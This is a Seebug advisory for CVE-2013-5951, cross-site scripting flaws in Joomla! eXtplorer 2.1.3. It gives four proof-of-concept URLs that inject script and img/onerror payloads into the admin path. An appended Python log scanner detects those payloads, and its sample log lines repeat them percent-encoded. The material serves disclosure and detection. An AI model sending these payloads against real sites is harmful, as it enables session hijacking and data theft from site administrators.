Joomla! eXtplorer Component Multiple Cross-Site Scripting Vulnerabilities

2014-03-19T00:00:00
ID SSV:61856
Type seebug
Reporter Root
Modified 2014-03-19T00:00:00

Description

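CVE ID: CVE-2013-5951

Joomla! is a content management system that is quite well known abroad.

Multiple scripts in the Joomla! eXtplorer component do not properly filter user-supplied input, which allows remote attackers to carry out cross-site scripting attacks and thereby obtain sensitive information or hijack user sessions.

Affected: Joomla! eXtplorer 2.1.3

No detailed solution is currently available: http://www.joomla.org/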

http://www.example.com/administrator/index.php/"></script><script>alert('XSS')</script>?option=com_extplorer&tmpl=component
http://www.example.com/administrator/index.php<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=post&do_action=admin 
http://www.example.com/administrator/index.php/<img src=x onerror=alert('XSS') >?option=com_extplorer&tmpl=component&action=post&do_action=copy 
http://www.example.com/administrator/index.php/<img src=x:alert(alt) onerror=eval(src) alt=XSS>?option=com_extplorer&tmpl=component&action=upload
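
An added example, not part of the original advisory or of the eXtplorer project: a log check for the pattern the URLs above share, markup placed in the path after index.php on a request whose query carries option=com_extplorer. It assumes Apache combined-format access logs; the sample lines, client addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines, Apache "combined" format (assumed log format).
SAMPLE_LOG = """
192.0.2.10 - - [19/Mar/2014:10:00:01 +0000] "GET /administrator/index.php?option=com_extplorer&tmpl=component HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [19/Mar/2014:10:02:13 +0000] "GET /administrator/index.php/%22%3E%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E?option=com_extplorer&tmpl=component HTTP/1.1" 200 5307 "-" "Mozilla/5.0"
198.51.100.8 - - [19/Mar/2014:10:02:40 +0000] "GET /administrator/index.php/%3Cimg%20src=x%20onerror=alert('XSS')%20%3E?option=com_extplorer&tmpl=component&action=post&do_action=copy HTTP/1.1" 200 5298 "-" "Mozilla/5.0"
192.0.2.11 - - [19/Mar/2014:10:03:05 +0000] "GET /index.php/blog/2014-news?option=com_content HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
""".strip().splitlines()

# Client address, then the request target between the method and the protocol.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/\d\.\d"')
# Characters that should never appear in the path segment after index.php.
MARKUP_RE = re.compile(r'[<>"\']')

def decode(value, rounds=3):
    """Percent-decode repeatedly so nested encoding does not hide markup."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_line(line):
    """Return (client, decoded path info) when a com_extplorer request carries
    markup in the path after index.php; return None otherwise."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    path, _, query = target.partition("?")
    if "com_extplorer" not in parse_qs(query).get("option", []):
        return None
    _, found, path_info = decode(path).partition("index.php")
    if found and MARKUP_RE.search(path_info):
        return client, path_info
    return None

def scan(lines):
    """Run check_line over an iterable of log lines and keep the hits."""
    return [hit for hit in map(check_line, lines) if hit]

if __name__ == "__main__":
    for client, path_info in scan(SAMPLE_LOG):
        print(client, path_info)
```

Because the check keys on the path segment rather than on a specific payload string, it also covers the other action and do_action variants listed above.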